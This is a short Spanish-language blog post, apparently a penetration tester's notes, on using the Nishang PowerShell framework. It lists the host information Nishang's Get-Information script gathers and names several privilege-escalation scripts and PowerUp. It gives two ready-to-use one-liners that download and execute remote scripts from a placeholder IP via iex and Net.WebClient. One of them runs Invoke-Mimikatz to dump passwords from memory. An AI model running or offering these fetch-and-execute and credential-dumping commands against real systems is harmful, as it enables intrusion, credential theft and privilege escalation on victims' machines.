Hasta ahora en mi blog me habia limitado a usar Nishang sobretodo como reverse shell pero me estoy dando cuenta que tiene más aplicaciones.

Un ejemplo es Get-information que extrae automaticamente

  1. Powershell environment:
  2. Putty trusted hosts:
  3. Putty saved sessions:
  4. Recently used commands:
  5. Shares on the machine:
  6. Environment variables:
  7. More details for current user:
  8. SNMP community strings:
  9. SNMP community strings for current user:
  10. Installed Applications:
  11. Installed Applications for current user:
  12. Domain Name:
  13. Contents of /etc/hosts:
  14. Running Services:
  15. Account Policy:
  16. Local users:
  17. Local Groups:
  18. WLAN Info:

Para ejecutarlo solo necesitas:

iex (New-Object Net.WebClient).DownloadString('http://IP/Get-Information.ps1'); Get-Information

Podemos usar Mimikatz para extraer passwords de la memoria

iex (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz’); InvokeMimikatz -DumpCreds

Nishang igual puede como priv esc:

Enable-DuplicateToken.ps1
Invoke-PsUACme.ps1
Remove-Update.ps1

Como extra y esto no es nishang podemos usar powerup